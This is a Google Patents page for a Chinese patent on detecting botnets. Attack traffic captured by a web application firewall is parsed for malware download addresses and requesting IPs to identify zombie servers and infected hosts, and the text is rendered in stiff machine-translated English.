CN104796386A - Detection method, device and system of botnet - Google Patents
Detection method, device and system of botnet Download PDFInfo
- Publication number
- CN104796386A CN104796386A CN201410027082.9A CN201410027082A CN104796386A CN 104796386 A CN104796386 A CN 104796386A CN 201410027082 A CN201410027082 A CN 201410027082A CN 104796386 A CN104796386 A CN 104796386A
- Authority
- CN
- China
- Prior art keywords
- data
- useful
- pay
- source address
- source
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Abstract
The invention provides a detection method, device and system of botnet, suitable for the field of computer network safety. The method comprises that attack behavior data captured at a network node is obtained; the attack behavior data is analyzed, and payload data contained by the attack behavior data is obtained; a source address where a malware is downloaded and a source IP which sends a download request are searched from the payload data; and a computer in the botnet is determined according to the source address and source IP. Compared with the name matching manner in the prior art, the detection method of the botnet provided by the invention can effectively avoid report mistakes and omission, and effectively improve the detection accuracy.
Description
Technical field
The invention belongs to computer network security field, particularly relate to a kind of detection method of Botnet, device and system.
Background technology
Botnet refers to and adopts one or more communication means that a large amount of main frame is infected bot program, thus between effector and infected main frame, form the net control of an one-to-many, wherein, infected main frame is referred to as corpse computer, and the main frame controlling these corpse computers is called corpse server.
Along with the lifting of the speedup of the network bandwidth and the hardware performance of cyber-net equipment, the speed goes that Botnet is propagated is fast, and its activity is more and more rampant.An Attack Platform is formed by Botnet, this platform is utilized can effectively to initiate various attack, comprise as Denial of Service attack, send spam, steal secret, abuse resource and Botnet dig ore deposit etc., can cause whole Back ground Information network or important application systemic breakdown, cause a large amount of secret or individual privacy leak or are used for being engaged in other illegal activities such as network fraud, its harmfulness is extremely serious.
For effectively detecting Botnet, thus reduce the harm brought by Botnet, usually user name nickname is used to carry out Botnet detection in prior art, but the rule due to nickname needs statistics to find, may occur the phenomenon failed to report or report by mistake, its Detection accuracy is not high.
Summary of the invention
The object of the embodiment of the present invention is the detection method providing a kind of Botnet, with solve prior art use user name nickname carry out detection Botnet time, easily there is the phenomenon failed to report or report by mistake, the problem that its Detection accuracy is not high.
The embodiment of the present invention is achieved in that a kind of detection method of Botnet, and described method comprises:
Obtain the attack data of catching at network node;
Resolve described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data;
Search the rogue program source address downloaded and the source IP sending download request that described pay(useful) load payload data comprise;
The computer in described Botnet is determined according to described source address and described source IP.
Another object of the embodiment of the present invention is the checkout gear providing a kind of Botnet, and described device comprises:
Data receipt unit, for obtaining the attack data of catching at network node;
Resolve acquiring unit, for resolving described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data;
Search unit, the source address that the rogue program comprised for searching described pay(useful) load payload data is downloaded and the source IP sending download request;
Determining unit, for determining the computer in described Botnet according to described source address and described source IP.
The embodiment of the present invention additionally provides a kind of detection system of Botnet, described system comprises the data catching function of each node location be arranged in detected network, and the data analytics server to be connected with each data catching function, described data catching function is for obtaining the attack data transmitted at network node, the attack data that described data analytics server is caught for the data catching function receiving each node location, obtain the pay(useful) load payload data that described attack data comprise, according to described pay(useful) load payload data search comprising the source address downloaded of rogue program and send the source IP of download request, the computer in described Botnet is determined according to described source address and described source IP.
In embodiments of the present invention, by obtaining the attack data of catching at network node, obtain the pay(useful) load that attack data comprise, in described pay(useful) load, search the source address that it rogue program comprised is downloaded and the IP sending download request, determine the computer in described Botnet according to described source address and described source IP.The behavioral characteristic that the present invention is propagating according to Botnet, attack data search is captured to the rogue program that pay(useful) load payload the comprises source address downloaded and the source IP sending download request from network node, thus effectively determine the computer in Botnet, with being compared by the mode of name-matches of prior art, the detection method of Botnet of the present invention can effectively avoid wrong report to fail to report phenomenon, the effective accuracy rate improving detection.
Accompanying drawing explanation
Fig. 1 is the realization flow figure of the detection method of the Botnet that first embodiment of the invention provides;
Fig. 2 is the realization flow figure of the detection method of the Botnet that second embodiment of the invention provides;
Fig. 3 is the structural representation of the Botnet detection system that third embodiment of the invention provides;
Fig. 4 is the structural representation that the detection system of the Botnet that third embodiment of the invention provides is applied to network and detects;
The structured flowchart of the checkout gear of the Botnet that Fig. 5 provides for fourth embodiment of the invention;
The structural representation of the equipment that Fig. 6 provides for fifth embodiment of the invention.
Embodiment
In order to make object of the present invention, technical scheme and advantage clearly understand, below in conjunction with drawings and Examples, the present invention is further elaborated.Should be appreciated that specific embodiment described herein only in order to explain the present invention, be not intended to limit the present invention.
While WEB application more and more horn of plenty, WEB server becomes primary challenge target, as injection attacks, information leakage, weak passwurd attack etc. gradually with its powerful computing capability, handling property and the higher-value that contains.Wherein, the numerous computers controlled by Botnet are also a kind of common attack forms to the attack of server.
For Timeliness coverage Botnet to find the computer of being encroached on, a kind of conventional method using user name nickname to carry out detecting Botnet at present, because the title (nickname) joining the so-called user in corpse server is by corpse (bot) Program Generating, so the nickname of these bot should meet certain generating algorithm, with certain regularity, if IP ADDRESS REPRESENTATION is exactly that three abbreviations of IP address the country one belongs to of the main frame of infected bot program are placed on beginning, then the random digit of designated length is added later, as USA|8028032, CHA|8920340, system representation be using the system of the main frame of infected bot program as the letter started as xp, 2000 etc., and then add the random digit of designated length later, as xp|8034,2000|80956).The feature of these names can find and sum up out from the bot source code obtained.The regularity of the nickname of these users is not identical with the randomness of the user nickname of normal irc, therefore by judging irc Botnet in network as nickname in characteristic character coupling http data characteristics.But the rule due to the nickname in this method needs statistics to find, may occur the phenomenon failed to report or report by mistake, its Detection accuracy is not high.
For analysis and resolution is to Botnet fast and effectively, the detection method of Botnet of the present invention, comprising: obtain the attack data of catching at network node; Resolve described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data; Search the rogue program source address downloaded and the source IP sending download request that described pay(useful) load payload data comprise; The computer in described Botnet is determined according to described source address and described source IP.
The behavioral characteristic that the present invention is propagating according to Botnet, attack data search is captured to the rogue program that pay(useful) load payload the comprises source address downloaded and the source IP sending download request from network node, thus effectively determine the computer in Botnet, with being compared by the mode of name-matches of prior art, the detection method of Botnet of the present invention can effectively avoid wrong report to fail to report phenomenon, the effective accuracy rate improving detection.
Embodiment one:
Fig. 1 shows the realization flow of the detection method of the Botnet that first embodiment of the invention provides, and details are as follows:
In step S101, obtain the attack data of catching at network node.
Concrete, obtain the attack data of catching at network node, can by the Web application firewall WAF system arranged at network node, by WAF system acquisition attack data, or active intrusion prevention system (English abbreviation is IPS, and English full name is Intrusion PreventionSystem) is set.
Described intrusion prevention system IPS is the safety means of computer network, is supplementing anti-virus software (Antivirus Programs) and fire compartment wall (Packet Filter, Application Gateway).Intrusion prevention system IPS be a kind of can the computer network security equipment of network data transport behavior of monitoring network or the network equipment, interruption, adjustment that can be instant or isolate that some are abnormal or have nocuous network data transport behavior.
Wherein, described Web application firewall WAF, its English full name is: Web Application Firewall, WAF can protect the attack in current Web application, different from traditional firewall, WAF works in application layer, detects based on known attack signature rule and protects the HTTP request flowed through and response.From the angle of functional framework, WAF comprises protection engine and attack signature rule.
The concrete protection process of network system architecture of application WAF is as follows: when to there is HTTP request on the internet and need the Web server of access back end, first, the forwarding of this HTTP request through router and the protection of traditional fire compartment wall, arrive WAF, the protection engine of WAF utilizes described rule to scan the HTTP request received, when finding to comprise attack data, capture described attack data, interception can also be adopted, abandon, the various ways such as to disconnect to process, request after WAF process finally arrives the Web server that in server zone, HTTP request is corresponding.Certainly, WAF also can receive the request from corporate intranet, and protects as above.
Described attack data, are specifically as follows the full content of described request, can certainly for only to comprise it for implementing the data code part of malicious act.
In step s 102, resolve described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data.
Trojan horse or other viral rogue program, can do the action that some are harmful or pernicious usually.Such as trojan horse, it is by attracting user to download execution self camouflage, there is provided to executing kind of wooden horse person the door opening aesthetic conceptions dibbling wooden horse person computer, make to execute kind of a wooden horse person and can damage arbitrarily, steal by kind of a wooden horse person's file, even remote control is by the computer of kind of person.And other virus is as worm-type virus, by constantly copying self function to other computer, the file in computer can be destroyed.The code section realizing these malicious action in above-mentioned attack data is called pay(useful) load payload.Different virus specifically performs different malicious action, therefore, payload can realize the thing that the program in any victim's of operating in environment can be done, if the action performed comprises destruction safe delete of files, send sensitive information to the author of virus or arbitrary recipient, and the back door leading to infected computer is provided.
Because virus is generally made up of two parts: payload payload and obscure parts, wherein payload is used to the code performing malicious action, and obscuring parts is then that virus is used for protecting and self avoids by killing.
For making effectively to analyze malicious action behavior, need first to extract the pay(useful) load partial data that virus comprises, the described attack data of described parsing, obtain the pay(useful) load payload data step that described attack data comprise and are specifically as follows:
The keyword of described attack data and predefined malicious action run time version is compared, judges in described attack data, whether comprise the keyword of described predefined malicious action run time version;
If comprise the keyword of described predefined malicious action run time version, then row or the statement of determining to comprise described malicious action run time version keyword place are pay(useful) load payload data.
Obtain in the viral keywords database that the keyword of described predefined malicious action run time version can be comprised by up-to-date virus base, can certainly user define as required.
In step s 103, the rogue program source address downloaded and the source IP sending download request that described pay(useful) load payload data comprise is searched.
The propagation expansion of current modal Botnet is all be InternetRelay Chat based on the English full name of IRC(, Chinese full name is: the Internet relay chat) agreement, this application layer protocol provides the server of an IRC and chat channel carries out mutual actual conversation.IRC agreement adopts the C/S model of client/server, client's side link can be made to IRC server, user can set up or select to add interested channel, and message can be sent to every other user in channel by each user, also can issue separately certain user.The keeper of channel can arrange the attribute of channel, and such as arranging password, arranging channel is stealth mode.
Assailant writes oneself IRC bot program, and described bot program only supports part IRC order, and the message received to make an explanation execution as order by it.Assailant writes bot program, after setting up the IRC server of oneself, bot program can be implanted subscriber computer by assailant in different ways, such as: carry out active by worm and propagate, utilize system vulnerability directly to invade computer, utilize social engineering, by Email or instant messenger, user cheating is downloaded and is performed bot program, utilizes the DCC order of IRC agreement, is directly undertaken propagating by IRC server, can also embed malicious code wait for that user browses in webpage.
After bot program runs on infected computer, be connected to specific IRC server with a random Nickname and built-in password, and add the channel of specifying.Assailant logs in this channel at any time, and sends authentication message, after certification is passed through, immediately to active bot program (or temporary transient inactive bot program) sending controling instruction.The reading of corpse computer is all is sent to the message of channel or the title of channel, if by the discernible instruction of the assailant of certification, then perform immediately.
Usually these instructions relate to renewal bot program, transmission or download specified file, Long-distance Control connection, initiate Denial of Service attack, open proxy server etc.
Along with the large-scale fast propagation of bot program, the incoherent computer of script connects, by the instruction of default bot program by assailant gradually, be connected to the IRC server of specifying, accept the control of assailant, form a huge network system, the formation of Here it is Botnet.Then initiated more by this platform, more concealed expansion intrusion behavior.
Therefore, in the evolution of Botnet, need constantly to download the rogue program such as bot program, wooden horse from corpse server, thus infect more computer.
The source IP step of described source address and transmission download request of searching the rogue program download that described pay(useful) load payload data comprise specifically can comprise:
Pay(useful) load payload data are downloaded keyword compare with pre-defined, searches and comprise download keyword in described pay(useful) load payload data;
According to the download keyword searched in described pay(useful) load payload data, the source IP determined the source address that the rogue program that described download keyword is corresponding is downloaded and send download request.
Certainly, the method of the source address passing through keyword lookup pay(useful) load payload data and rogue program download in step S102 and step S103 and the source IP sending download request, just wherein a kind of more excellent execution mode, persons skilled in the art can be understood, the mode etc. of such as program structure analysis can also be adopted to carry out searching corresponding data.
In step S104, determine the computer in described Botnet according to described source address and described source IP.
According to the propagating characteristic of Botnet, the attack data comprised by pay(useful) load carry out the corpse computer that rogue program download request sends, and form distinguish with the request of general computer user.When getting the source address that rogue program that described pay(useful) load payload data comprise downloads and the source IP sending download request (download link, request as closelyed follow after by download request download as described in the request source IP of rogue program), can according to source address information and source IP addresses information, obtain the address of corpse computer in Botnet and corpse server accordingly.
The embodiment of the present invention is by obtaining the attack data of catching at network node, obtain the pay(useful) load that attack data comprise, in described pay(useful) load, search the source address that it rogue program comprised is downloaded and the IP sending download request, determine the computer in described Botnet according to described source address and described source IP.The behavioral characteristic that the present invention is propagating according to Botnet, attack data search is captured to the rogue program that pay(useful) load payload the comprises source address downloaded and the source IP sending download request from network node, thus effectively determine the computer in Botnet, with being compared by the mode of name-matches of prior art, the detection method of Botnet of the present invention can effectively avoid wrong report to fail to report phenomenon, the effective accuracy rate improving detection.
Embodiment two:
Fig. 2 shows the realization flow of the detection method of the Botnet that second embodiment of the invention provides, and details are as follows:
In step s 201, the attack data of catching at network node are obtained.
In step S202, resolve described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data.
In step S203, search the rogue program source address downloaded and the source IP sending download request that described pay(useful) load payload data comprise.
In step S204, in described pay(useful) load payload data, judge whether the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number.
Due on other occasions, the download request of user's false triggering to rogue program may be there is, as user click some illegal websites the download request of rogue program touched, in this case, erroneous judgement may be there is for the computer of false triggering rogue program download request.
Occur for avoiding this situation, in the embodiment of the present invention in step S204, the number of times that the identical rogue program loading source address sent in pay(useful) load occurs is added up, when being greater than predetermined number of times, then judge in progressive step S205, otherwise computer corresponding to the source address can downloaded computer corresponding to described download request source and rogue program judges.
Further, in order to avoid same computer sends repeatedly download request, also need when adding up download request to distinguish different computers, thus more efficiently statistics can be obtained.
In step S205, if the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number, the main frame that then described rogue program loading source address is corresponding is defined as corpse server, and the computer corresponding to source IP sending corresponding download request is defined as corpse computer.
The number of times occurred when the identical rogue program loading source address that different computer sends is greater than pre-determined number, represent that the rogue program downloaded in the query-attack payload of multiple separate sources points to same loading source, then think that this is a Botnet attack.This batch of attack source, namely sends the source of corresponding download request, is identified as by the controlled corpse computer of capturing; And loading source, the main frame that namely described rogue program loading source address is corresponding, is judged as Botnet node or corpse server.
The embodiment of the present invention is compared with embodiment one, the step comprising " judging whether the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number " is added in the condition judging Botnet, thus make, for the situation can avoiding the erroneous judgement caused because of user's false triggering when judging Botnet, to further increase the accuracy that it detects.
Embodiment three:
Fig. 3 shows the detection system structural representation of the Botnet that third embodiment of the invention provides, and details are as follows:
The detection system of the Botnet described in the embodiment of the present invention, comprise the data catching function of each node location be arranged in detected network, and the data analytics server to be connected with each data catching function, described data catching function is for obtaining the attack data transmitted at network node, the attack data that described data analytics server is caught for the data catching function receiving each node location, obtain the pay(useful) load payload data that described attack data comprise, according to described pay(useful) load payload data search comprising the source address downloaded of rogue program and send the source IP of download request, the computer in described Botnet is determined according to described source address and described source IP.
In figure 3, described network node can be the main core switch node of part, or other important switch place, for making data retransmission or exchange between coupled computer.
Described data catching function, can for being arranged at the WAF system at network node place, certainly can also use other data filter screen required for data, the just wherein a kind of execution mode preferably of the WAF system in Fig. 3.
Described data analytics server, for connecting each data analysis set-up, the attack data obtained by described data analysis set-up are resolved, obtain the pay(useful) load payload data that described attack data comprise, and search the source address of the rogue program download that described pay(useful) load payload data comprise and send the source IP of download request, thus determine the computer in Botnet accordingly.
Wherein, described data analytics server, also specifically in described pay(useful) load payload data, judges whether the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number; If the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number, the main frame that then described rogue program loading source address is corresponding is defined as corpse server, and the computer corresponding to source IP sending corresponding download request is defined as corpse computer.
Data analytics server described in the embodiment of the present invention can also comprise multiple distribution or be integrated in each network node location, also can be sent to same independently data analytics server by each network node.
In the application schematic diagram of Fig. 4 for the Botnet detection system described in third embodiment of the invention, by corpse server controls multiple stage corpse computer, attack source 1 in described corpse computer and Fig. 3 and attack source N, by the routing forwarding of core switch, the attack data comprising virus are sent to kiosk, after kiosk is attacked, perform corresponding operation and download the rogue programs such as wooden horse, corpse server can be controlled by the kiosk of attacking.The described core switch bypass of the embodiment of the present invention has Web application firewall WAF system, described WAF system acquisition attack data, and described behavioral data is collected to data analytics server carries out data analysis.
System described in the embodiment of the present invention is corresponding with method described in embodiment one and embodiment two, by capturing attack data search from network node to the rogue program that pay(useful) load payload the comprises source address downloaded and the source IP sending download request, thus effectively determine the computer in Botnet, with being compared by the mode of name-matches of prior art, the detection method of Botnet of the present invention can effectively avoid wrong report to fail to report phenomenon, the effective accuracy rate improving detection.
Embodiment four:
Fig. 5 shows the structured flowchart of the checkout gear of the Botnet that fourth embodiment of the invention provides, and details are as follows:
The checkout gear of the Botnet described in the embodiment of the present invention comprises:
Data receipt unit 501, for obtaining the attack data of catching at network node;
Resolve acquiring unit 502, for resolving described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data;
Search unit 503, the source address that the rogue program comprised for searching described pay(useful) load payload data is downloaded and the source IP sending download request;
Determining unit 504, for determining the computer in described Botnet according to described source address and described source IP.
Further, described data receipt unit 501 is specifically for receiving by the attack data of catching at network node, and described attack data are be arranged at the attack data that the Web application firewall WAF system at network node place or intrusion prevention system IPS catch.
Further, described parsing acquiring unit 502 comprises:
First compares subelement, for being compared by the keyword of described attack data and predefined malicious action run time version, judging in described attack data, whether comprising the keyword of described predefined malicious action run time version;
Pay(useful) load determination subelement, if the keyword for comprising described predefined malicious action run time version, then row or the statement of determining to comprise described malicious action run time version keyword place are pay(useful) load payload data.
Further, described determining unit 504 comprises:
Judgment sub-unit, in described pay(useful) load payload data, judges whether the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number;
Botnet determination subelement, if the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number, the main frame that then described rogue program loading source address is corresponding is defined as corpse server, and the computer corresponding to source IP sending corresponding download request is defined as corpse computer.
Search unit 503 further to comprise:
Second compares subelement, for pay(useful) load payload data are downloaded keyword compare with pre-defined, searches and comprises download keyword in described pay(useful) load payload data;
Subelement is determined in address, for according to the download keyword searched in described pay(useful) load payload data, determines the source IP of the source address that the rogue program that described download keyword is corresponding is downloaded and transmission download request.
The checkout gear of Botnet described in the embodiment of the present invention is corresponding with the detection method of the Botnet described in embodiment one to embodiment three, does not repeat at this.
Embodiment five:
The structured flowchart of the terminal that Fig. 6 that Fig. 6 provides for fifth embodiment of the invention provides for fourth embodiment of the invention, terminal described in the present embodiment, comprising: the parts such as memory 620, mixed-media network modules mixed-media 670, processor 680 and power supply 690.It will be understood by those skilled in the art that the restriction of the not structure paired terminal of the terminal structure shown in Fig. 6, the parts more more or less than diagram can be comprised, or combine some parts, or different parts are arranged.
Concrete introduction is carried out below in conjunction with Fig. 6 each component parts to terminal:
Memory 620 can be used for storing software program and module, and processor 680 is stored in software program and the module of memory 620 by running, thus performs various function application and the data processing of terminal.Memory 620 mainly can comprise storage program district and store data field, and wherein, storage program district can storage operation system, application program (such as sound-playing function, image player function etc.) etc. needed at least one function; Store data field and can store the data (such as voice data, phone directory etc.) etc. created according to the use of terminal.In addition, memory 620 can comprise high-speed random access memory, can also comprise nonvolatile memory, such as at least one disk memory, flush memory device or other volatile solid-state parts.
Mixed-media network modules mixed-media 670 can comprise Wireless Fidelity (wireless fidelity, WiFi) module, cable network module or radio-frequency module, wherein wireless fidelity module belongs to short range wireless transmission technology, by mixed-media network modules mixed-media 670, terminal can help that user sends and receive e-mail, browsing page and access streaming video etc., and its broadband internet wireless for user provides is accessed.Although Fig. 6 shows mixed-media network modules mixed-media 670, be understandable that, it does not belong to must forming of terminal, can omit in the scope of essence not changing invention as required completely.
Processor 680 is control centres of terminal, utilize the various piece of various interface and the whole terminal of connection, software program in memory 620 and/or module is stored in by running or performing, and call the data be stored in memory 620, perform various function and the deal with data of terminal, thus integral monitoring is carried out to terminal.Optionally, processor 680 can comprise one or more processing unit; Preferably, processor 680 accessible site application processor and modem processor, wherein, application processor mainly processes operating system, user interface and application program etc., and modem processor mainly processes radio communication.Be understandable that, above-mentioned modem processor also can not be integrated in processor 680.
Terminal also comprises the power supply 690(such as battery of powering to all parts), preferably, power supply can be connected with processor 680 logic by power-supply management system, thus realizes the functions such as management charging, electric discharge and power managed by power-supply management system.
Although not shown, terminal can also comprise input equipment, display device, voicefrequency circuit, camera, bluetooth module etc., does not repeat them here.
In embodiments of the present invention, the processor 680 included by this terminal also has following functions: the detection method performing Botnet, comprising:
Obtain the attack data of catching at network node;
Resolve described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data;
Search the rogue program source address downloaded and the source IP sending download request that described pay(useful) load payload data comprise;
The computer in described Botnet is determined according to described source address and described source IP.
The foregoing is only preferred embodiment of the present invention, not in order to limit the present invention, all any amendments done within the spirit and principles in the present invention, equivalent replacement and improvement etc., all should be included within protection scope of the present invention.
Claims (13)
1. a detection method for Botnet, is characterized in that, described method comprises:
Obtain the attack data of catching at network node;
Resolve described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data;
Search the rogue program source address downloaded and the source IP sending download request that described pay(useful) load payload data comprise;
The computer in described Botnet is determined according to described source address and described source IP.
2. method according to claim 1, it is characterized in that, the attack data step that described acquisition is caught at network node is specially:
Receive by the attack data of catching at network node, described attack data are be arranged at the attack data that the Web application firewall WAF system at network node place or intrusion prevention system IPS catch.
3. method according to claim 1, is characterized in that, the described attack data of described parsing, obtains the pay(useful) load payload data step that described attack data comprise and comprises:
The keyword of described attack data and predefined malicious action run time version is compared, judges in described attack data, whether comprise the keyword of described predefined malicious action run time version;
If comprise the keyword of described predefined malicious action run time version, then row or the statement of determining to comprise described malicious action run time version keyword place are pay(useful) load payload data.
4. method according to claim 1, is characterized in that, describedly determines that the computer in described Botnet is specially according to described source address and described source IP:
In described pay(useful) load payload data, judge whether the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number;
If the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number, the main frame that then described rogue program loading source address is corresponding is defined as corpse server, and the computer corresponding to source IP sending corresponding download request is defined as corpse computer.
5. method according to claim 1, is characterized in that, described in search the source address that rogue program that described pay(useful) load payload data comprise downloads and the source IP step sending download request specifically can comprise:
Pay(useful) load payload data are downloaded keyword compare with pre-defined, searches and comprise download keyword in described pay(useful) load payload data;
According to the download keyword searched in described pay(useful) load payload data, the source IP determined the source address that the rogue program that described download keyword is corresponding is downloaded and send download request.
6. a checkout gear for Botnet, is characterized in that, described device comprises:
Data receipt unit, for obtaining the attack data of catching at network node;
Resolve acquiring unit, for resolving described attack data, obtain the pay(useful) load payload data that described attack data comprise, described pay(useful) load payload data are the code section realizing malicious action in attack data;
Search unit, the source address that the rogue program comprised for searching described pay(useful) load payload data is downloaded and the source IP sending download request;
Determining unit, for determining the computer in described Botnet according to described source address and described source IP.
7. device according to claim 6, it is characterized in that, described data receipt unit is specifically for receiving by the attack data of catching at network node, and described attack data are be arranged at the attack data that the Web application firewall WAF system at network node place or intrusion prevention system IPS catch.
8. device according to claim 6, it is characterized in that, described parsing acquiring unit comprises:
First compares subelement, for being compared by the keyword of described attack data and predefined malicious action run time version, judging in described attack data, whether comprising the keyword of described predefined malicious action run time version;
Pay(useful) load determination subelement, if the keyword for comprising described predefined malicious action run time version, then row or the statement of determining to comprise described malicious action run time version keyword place are pay(useful) load payload data.
9. device according to claim 6, it is characterized in that, described determining unit comprises:
Judgment sub-unit, in described pay(useful) load payload data, judges whether the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number;
Botnet determination subelement, if the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number, the main frame that then described rogue program loading source address is corresponding is defined as corpse server, and the computer corresponding to source IP sending corresponding download request is defined as corpse computer.
10. device according to claim 6, is characterized in that, described in search unit and comprise:
Second compares subelement, for pay(useful) load payload data are downloaded keyword compare with pre-defined, searches and comprises download keyword in described pay(useful) load payload data;
Subelement is determined in address, for according to the download keyword searched in described pay(useful) load payload data, determines the source IP of the source address that the rogue program that described download keyword is corresponding is downloaded and transmission download request.
The detection system of 11. 1 kinds of Botnets, it is characterized in that, described system comprises the data catching function of each node location be arranged in detected network, and the data analytics server to be connected with each data catching function, described data catching function is for obtaining the attack data transmitted at network node, the attack data that described data analytics server is caught for the data catching function receiving each node location, obtain the pay(useful) load payload data that described attack data comprise, according to described pay(useful) load payload data search comprising the source address downloaded of rogue program and send the source IP of download request, the computer in described Botnet is determined according to described source address and described source IP.
12., according to system described in claim 11, is characterized in that, described data catching function is the Web application firewall WAF system being arranged at network node place.
13. according to system described in claim 11, it is characterized in that, described data analytics server, specifically in described pay(useful) load payload data, judges whether the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number; If the number of times that the identical rogue program loading source address sent by different computer occurs is greater than pre-determined number, the main frame that then described rogue program loading source address is corresponding is defined as corpse server, and the computer corresponding to source IP sending corresponding download request is defined as corpse computer.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410027082.9A CN104796386B (en) | 2014-01-21 | 2014-01-21 | Botnet detection method, device and system |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201410027082.9A CN104796386B (en) | 2014-01-21 | 2014-01-21 | Botnet detection method, device and system |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN104796386A true CN104796386A (en) | 2015-07-22 |
| CN104796386B CN104796386B (en) | 2020-02-11 |
Family
ID=53560899
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201410027082.9A Active CN104796386B (en) | 2014-01-21 | 2014-01-21 | Botnet detection method, device and system |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN104796386B (en) |
Cited By (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN107342967A (en) * | 2016-05-03 | 2017-11-10 | 宏碁股份有限公司 | Botnet detecting system and its method |
| CN109150871A (en) * | 2018-08-14 | 2019-01-04 | 阿里巴巴集团控股有限公司 | Safety detection method, device, electronic equipment and computer readable storage medium |
| CN110119858A (en) * | 2018-02-05 | 2019-08-13 | 南京易司拓电力科技股份有限公司 | The Data Quality Assessment Methodology of automation system for the power network dispatching based on big data |
| CN110430199A (en) * | 2019-08-08 | 2019-11-08 | 杭州安恒信息技术股份有限公司 | Identify the method and system of Internet of Things Botnet attack source |
Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101360019A (en) * | 2008-09-18 | 2009-02-04 | 华为技术有限公司 | Detection method, system and apparatus of zombie network |
| CN101404658A (en) * | 2008-10-31 | 2009-04-08 | 北京锐安科技有限公司 | Method and system for detecting bot network |
| CN101588276A (en) * | 2009-06-29 | 2009-11-25 | 成都市华为赛门铁克科技有限公司 | A kind of method and device thereof that detects Botnet |
| CN101714931A (en) * | 2009-11-26 | 2010-05-26 | 成都市华为赛门铁克科技有限公司 | Early warning method, device and system of unknown malicious code |
-
2014
- 2014-01-21 CN CN201410027082.9A patent/CN104796386B/en active Active
Patent Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101360019A (en) * | 2008-09-18 | 2009-02-04 | 华为技术有限公司 | Detection method, system and apparatus of zombie network |
| CN101404658A (en) * | 2008-10-31 | 2009-04-08 | 北京锐安科技有限公司 | Method and system for detecting bot network |
| CN101588276A (en) * | 2009-06-29 | 2009-11-25 | 成都市华为赛门铁克科技有限公司 | A kind of method and device thereof that detects Botnet |
| CN101714931A (en) * | 2009-11-26 | 2010-05-26 | 成都市华为赛门铁克科技有限公司 | Early warning method, device and system of unknown malicious code |
Cited By (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN107342967A (en) * | 2016-05-03 | 2017-11-10 | 宏碁股份有限公司 | Botnet detecting system and its method |
| CN107342967B (en) * | 2016-05-03 | 2020-07-31 | 安碁资讯股份有限公司 | Botnet detection system and method thereof |
| CN110119858A (en) * | 2018-02-05 | 2019-08-13 | 南京易司拓电力科技股份有限公司 | The Data Quality Assessment Methodology of automation system for the power network dispatching based on big data |
| CN109150871A (en) * | 2018-08-14 | 2019-01-04 | 阿里巴巴集团控股有限公司 | Safety detection method, device, electronic equipment and computer readable storage medium |
| CN109150871B (en) * | 2018-08-14 | 2021-02-19 | 创新先进技术有限公司 | Security detection method and device, electronic equipment and computer readable storage medium |
| CN110430199A (en) * | 2019-08-08 | 2019-11-08 | 杭州安恒信息技术股份有限公司 | Identify the method and system of Internet of Things Botnet attack source |
| CN110430199B (en) * | 2019-08-08 | 2021-11-05 | 杭州安恒信息技术股份有限公司 | Method and system for identifying internet of things botnet attack source |
Also Published As
| Publication number | Publication date |
|---|---|
| CN104796386B (en) | 2020-02-11 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US20240154996A1 (en) | Secure Notification on Networked Devices | |
| CN107888607B (en) | Network threat detection method and device and network management equipment | |
| US10354072B2 (en) | System and method for detection of malicious hypertext transfer protocol chains | |
| US9319382B2 (en) | System, apparatus, and method for protecting a network using internet protocol reputation information | |
| US9392001B2 (en) | Multilayered deception for intrusion detection and prevention | |
| US8561177B1 (en) | Systems and methods for detecting communication channels of bots | |
| US8204984B1 (en) | Systems and methods for detecting encrypted bot command and control communication channels | |
| CN108881101B (en) | Cross-site script vulnerability defense method and device based on document object model and client | |
| US8850584B2 (en) | Systems and methods for malware detection | |
| US9124617B2 (en) | Social network protection system | |
| US11799876B2 (en) | Web crawler systems and methods to efficiently detect malicious sites | |
| US9787711B2 (en) | Enabling custom countermeasures from a security device | |
| BalaGanesh et al. | Smart devices threats, vulnerabilities and malware detection approaches: a survey | |
| CN104796386A (en) | Detection method, device and system of botnet | |
| Jeyanthi | Internet of things (iot) as interconnection of threats (iot) | |
| Zhao et al. | A review on IoT botnet | |
| Affinito et al. | The evolution of Mirai botnet scans over a six-year period | |
| CN114928564A (en) | Function verification method and device of security component | |
